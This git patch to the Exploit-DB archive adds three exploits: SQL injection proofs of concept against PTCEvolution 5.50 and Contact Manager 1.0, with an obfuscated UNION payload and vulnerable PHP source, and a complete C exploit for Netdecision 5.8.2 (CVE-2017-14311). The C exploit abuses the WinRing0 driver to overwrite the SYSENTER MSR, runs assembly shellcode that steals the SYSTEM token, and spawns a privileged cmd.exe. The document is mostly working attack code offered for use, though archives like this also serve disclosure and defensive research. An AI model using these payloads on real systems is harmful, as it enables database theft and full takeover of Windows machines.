From bc6f82924cc58133278e780df89fedfef3d7b3ce Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 18 Sep 2017 05:01:20 +0000
Subject: [PATCH] DB: 2017-09-18

3 new exploits

Netdecision 5.8.2 - Local Privilege Escalation
PTCEvolution 5.50 - SQL Injection
Contact Manager 1.0 - 'femail' Parameter SQL Injection
---
 files.csv                       |   3 +
 platforms/php/webapps/42733.txt |  28 +++
 platforms/php/webapps/42734.txt |  51 ++++++
 platforms/windows/local/42735.c | 313 ++++++++++++++++++++++++++++++++
 4 files changed, 395 insertions(+)
 create mode 100755 platforms/php/webapps/42733.txt
 create mode 100755 platforms/php/webapps/42734.txt
 create mode 100755 platforms/windows/local/42735.c

diff --git a/files.csv b/files.csv
index a8ac268ed..37808eed7 100644
--- a/files.csv
+++ b/files.csv
@@ -9236,6 +9236,7 @@ id,file,description,date,author,platform,type,port
 42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
 42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation",2017-09-12,mr_me,windows,local,0
 42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0
+42735,platforms/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -38511,3 +38512,5 @@ id,file,description,date,author,platform,type,port
 42729,platforms/hardware/webapps/42729.py,"D-Link DIR8xx Routers - Leak Credentials",2017-09-12,embedi,hardware,webapps,0
 42730,platforms/hardware/webapps/42730.py,"D-Link DIR8xx Routers - Root Remote Code Execution",2017-09-12,embedi,hardware,webapps,0
 42731,platforms/hardware/webapps/42731.sh,"D-Link DIR8xx Routers - Local Firmware Upload",2017-09-12,embedi,hardware,webapps,0
+42733,platforms/php/webapps/42733.txt,"PTCEvolution 5.50 - SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0
+42734,platforms/php/webapps/42734.txt,"Contact Manager 1.0 - 'femail' Parameter SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/42733.txt b/platforms/php/webapps/42733.txt
new file mode 100755
index 000000000..ba4471e95
--- /dev/null
+++ b/platforms/php/webapps/42733.txt
@@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: PTCEvolution 5.50 - SQL Injection
+# Dork: N/A
+# Date: 15.09.2017
+# Vendor Homepage: http://ptcevolution.com/
+# Software Link: http://www.ptcevolution.com/demoo/
+# Demo: http://demo.ptcevolution.com/
+# Version: 5.50
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?view=product&id=[SQL]
+# http://localhost/[PATH]/index.php?view=products&id=[SQL]
+# 
+# -4++/*!03333UNION*/(/*!03333SELECT*/+(1),(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9))--+-
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42734.txt b/platforms/php/webapps/42734.txt
new file mode 100755
index 000000000..19c23f169
--- /dev/null
+++ b/platforms/php/webapps/42734.txt
@@ -0,0 +1,51 @@
+# # # # # 
+# Exploit Title: Contact Manager 1.0 - SQL Injection
+# Dork: N/A
+# Date: 15.09.2017
+# Vendor Homepage: http://savsofteproducts.com/
+# Software Link: http://www.contactmanagerscript.com/download/contact_manager_1380185909.zip
+# Demo: http://contactmanagerscript.com/demo/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Vulnerable Source:
+#
+# .............
+# <a href="login.php?forgot=1">Forgot Password ?</a>
+# <?php
+# if(isset($_REQUEST["forgot"])){
+# if($_REQUEST["forgot"]=="2"){
+# $result=mysql_query("select * from co_setting where Email='$_REQUEST[femail]' ");
+# $count=mysql_num_rows($result);
+# if($count==1)
+# 
+# {
+# 
+# $npass=rand("5556","99999");
+# 
+# $to      = $row['femail'];
+# $subject = "Password Reset";
+# $message = "New Primary Password is: $npass \r\n";
+# $headers = "From: $Email";
+# 
+# $npass=md5($npass);
+# 
+# $query="update co_setting set Password='$npass' where Email='$_REQUEST[femail]'";
+# mysql_query($query);
+# .............
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/login.php?forgot=2&femail=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/windows/local/42735.c b/platforms/windows/local/42735.c
new file mode 100755
index 000000000..c6986d1a7
--- /dev/null
+++ b/platforms/windows/local/42735.c
@@ -0,0 +1,313 @@
+// Netdecision.cpp : Defines the entry point for the console application.
+/*
+# Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys
+# Date: 2017.09.17
+# Exploit Author: Peter Baris
+# Vendor Homepage: www.netmechanica.com
+# Software Link: http://www.netmechanica.com/downloads/  //registration required
+# Version: 5.8.2 
+# Tested on: Windows 7 Pro SP1 x86 / Windows 7 Enterprise SP1
+# CVE : CVE-2017-14311 
+
+Vendor notified on 2017.09.11 - no response */
+
+#include "stdafx.h"
+#include <stdio.h>
+#include <Windows.h>
+#include <winioctl.h>
+#include <tlhelp32.h>
+#include <Psapi.h>
+
+#define DEVICE_NAME L"\\\\.\\WinRing0_1_2_0"
+
+
+
+LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
+HANDLE GetDeviceHandle(LPCTSTR FileName) {
+	HANDLE hFile = NULL;
+
+	hFile = CreateFile(FileName,
+		GENERIC_READ | GENERIC_WRITE,
+		0,
+		0,
+		OPEN_EXISTING,
+		NULL,
+		0);
+
+	return hFile;
+}
+
+
+extern ULONG ZwYieldExecution = NULL;
+extern PVOID KernelBaseAddressInKernelMode = NULL;
+extern	HMODULE hKernelInUserMode = NULL;
+
+VOID GetKiFastSystemCall() {
+
+	SIZE_T ReturnLength;
+	HMODULE hntdll = NULL;
+
+	ULONG ZwYieldExecution_offset;
+
+
+	hntdll = LoadLibraryA("ntdll.dll");
+
+	if (!hntdll) {
+		printf("[-] Failed to Load ntdll.dll: 0x%X\n", GetLastError());
+		exit(EXIT_FAILURE);
+	}
+
+	LPVOID drivers[1024];
+	DWORD cbNeeded;
+
+	EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
+	KernelBaseAddressInKernelMode = drivers[0];
+
+
+	printf("[+] Kernel base address: 0x%X\n", KernelBaseAddressInKernelMode);
+	
+	hKernelInUserMode = LoadLibraryA("ntkrnlpa.exe");
+
+	if (!hKernelInUserMode) {
+		printf("[-] Failed to load kernel: 0x%X\n", GetLastError());
+		exit;
+	}
+
+
+	printf("[+] KernelImage Base in User-Mode 0x%X\r\n", hKernelInUserMode);
+
+	
+	
+
+	ZwYieldExecution = GetProcAddress(hKernelInUserMode, "ZwYieldExecution");
+	
+	if (!ZwYieldExecution) {
+		printf("[-] Failed to resolve KiFastSystemCall: 0x%X\n", GetLastError());
+		exit;
+	}
+	
+	ZwYieldExecution_offset = (ULONG)ZwYieldExecution - (ULONG)hKernelInUserMode;
+	printf("[+] ZwYieldExecution's offset address in ntkrnlpa.exe: 0x%X\n", ZwYieldExecution_offset);
+
+
+	(ULONG)ZwYieldExecution = (ULONG)ZwYieldExecution_offset + (ULONG)KernelBaseAddressInKernelMode;
+
+	printf("[+] ZwYieldExecution's address in kernel-mode: 0x%X\n", ZwYieldExecution);
+
+
+	if (hntdll) {
+		FreeLibrary(hntdll);
+	}
+
+	if (hKernelInUserMode) {
+		FreeLibrary(hKernelInUserMode);
+	}
+
+	hntdll = NULL;
+
+	return hKernelInUserMode;
+	return ZwYieldExecution;
+}
+
+
+extern ULONG eip = NULL;
+extern ULONG pesp = NULL;
+extern ULONG pebp = NULL;
+extern ULONG ETHREAD = NULL;
+
+ULONG Shellcode() {
+
+	ULONG FunctionAddress = ZwYieldExecution;
+	
+	__asm {
+
+		pushad
+		pushfd
+		xor eax,eax
+
+		mov edi, FunctionAddress  ; Address of ZwYieldExection to EDI
+
+		SearchCall:
+		mov eax, 0xe8
+		scasb
+		jnz SearchCall
+
+		mov ebx, edi
+		mov ecx, [edi]
+		add ebx, ecx; EBX points to KiSystemService
+		add ebx, 0x4
+
+		lea edi, [ebx - 0x1]
+		SearchFastCallEntry:
+		mov eax, 0x00000023
+		scasd
+		jnz SearchFastCallEntry
+		mov eax, 0xa10f306a
+		scasd
+		jnz SearchFastCallEntry
+
+		lea eax,[edi-0x9]
+		xor edx, edx
+		mov ecx, 0x176
+
+
+		wrmsr
+		popfd
+		popad
+			
+		
+		mov eax,ETHREAD
+		
+		mov eax,[eax]
+		mov eax, [eax+0x050]
+		mov ecx, eax
+		mov edx, 0x4
+		
+		FindSystemProcess :
+		mov eax, [eax + 0x0B8]
+		sub eax, 0x0B8
+		cmp[eax + 0x0B4], edx
+		jne FindSystemProcess
+
+		
+		mov edx, [eax + 0x0F8]
+		mov[ecx + 0x0F8], edx
+
+		;xor eax, eax
+		mov esp,pesp
+		mov ebp,pebp
+	
+		push eip
+	;		int 3
+		ret
+		
+	}
+	
+}
+
+
+
+int main()
+{
+	HANDLE hlib = NULL;
+	HANDLE hFile = NULL;
+	PVOID lpInBuffer = NULL;
+	ULONG lpOutBuffer = NULL;
+	ULONG lpBytesReturned;
+	PVOID BuffAddress = NULL;
+	SIZE_T BufferSize = 0x1000;
+	SIZE_T nOutBufferSize = 0x800;
+	ULONG Interval = 0;
+	ULONG Shell = &Shellcode;
+	NTSTATUS NtStatus = NULL;
+
+
+	
+	/* Undocumented feature to trigger the vulnerability */
+	hlib = LoadLibraryA("ntdll.dll");
+
+	if (!hlib) {
+		printf("[-] Failed to load the library: 0x%X\n", GetLastError());
+		exit(EXIT_FAILURE);
+	}
+	
+
+	GetKiFastSystemCall();
+	
+	/* Allocate memory for our input and output buffers */
+	lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	
+	/*Getting KiFastSystemCall address from ntdll.dll to restore it in 0x176 MSR*/
+	
+
+	lpOutBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	//printf("[+] Address to write our shellcode's address to: 0x%X\r\n", lpOutBuffer);
+
+
+	/* Crafting the input buffer */
+
+	BuffAddress = (PVOID)(((ULONG)lpInBuffer));
+	*(PULONG)BuffAddress = (ULONG)0x00000176; /*IA32_SYSENTER_EIP MSR*/
+	BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x4));
+	*(PULONG)BuffAddress = (ULONG)Shell; /*Our assembly shellcode Pointer into EAX*/
+	BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x8));
+	*(PULONG)BuffAddress = (ULONG)0x00000000;  /* EDX is 0x00000000 in 32bit mode */
+	BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0xc));
+	*(PULONG)BuffAddress = (ULONG)0x00000000;
+
+
+	//RtlFillMemory(lpInBuffer, BufferSize, 0x41);
+	//RtlFillMemory(lpOutBuffer, BufferSize, 0x42);
+
+	
+	//printf("[+] Trying the get the handle for the WinRing0_1_2_0 device.\r\n");
+
+	hFile = GetDeviceHandle(FileName);
+
+	if (hFile == INVALID_HANDLE_VALUE) {
+		printf("[-] Can't get the device handle. 0x%X\r\n", GetLastError());
+		return 1;
+	}
+	else
+	{
+		printf("[+] Handle opened for WinRing0x32. Sending IOCTL.\r\n");
+	}
+	
+	/*Here we calculate the EIP for our return from kernel-mode. This exploit does not let us simply adjust the stack and return*/
+
+	(HANDLE)eip = GetModuleHandleA(NULL); /*Getting the base address of our process*/
+	printf("[+] Current process base address 0x%X\r\n", (HANDLE)eip);
+	(HANDLE)eip = eip + 0x13ae; /*Any time you change something in the main() section you MUST adjust the offset to point to the PUSH 40 instrction*/
+	printf("[+] Return address (EIP) from kernel-mode 0x%X\r\n", (HANDLE)eip);
+
+	/*Setting CPU affinity before execution to maximize the chance of executing our code on the same CPU core*/
+	DWORD_PTR i = 1; /*CPU Core with ID 1 will be always chosen for the execution*/
+
+	ULONG affinity = SetThreadAffinityMask(GetCurrentThread(), i);
+
+	printf("[+] Setting affinity for logical CPU with ID:%d\r\n", i);
+		if (affinity == NULL) {
+
+			printf("[-] Something went wrong while setting CPU affinity 0x%X\r\n", GetLastError());
+			exit(1);
+		}
+	
+	ETHREAD = (ULONG)KernelBaseAddressInKernelMode + 0x12bd24; /*Offset to nt!KiInitialThread as TEB is not readable*/
+
+	/*Saving stack pointer and stack frame of user-mode before diving in kernel-mode to restore it before returning to user-mode */
+
+	__asm {
+		
+		mov pesp, esp
+		mov pebp, ebp
+		nop
+	}
+	
+
+	DeviceIoControl(hFile,
+		0x9C402088, 
+		lpInBuffer,
+		0x10,
+		lpOutBuffer, 
+		0x20,  
+		&lpBytesReturned,
+		NULL);
+	
+	
+
+		STARTUPINFO info = { sizeof(info) };
+		PROCESS_INFORMATION processInfo;
+		NTSTATUS proc;
+		LPCSTR command = L"C:\\Windows\\System32\\cmd.exe";
+		proc = CreateProcess(command, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &info, &processInfo);
+
+		if (!proc) {
+	
+			printf("ERROR 0x%X\r\n", proc);
+		}
+		WaitForSingleObject(processInfo.hProcess, INFINITE);
+	
+
+	exit(0);
+}
+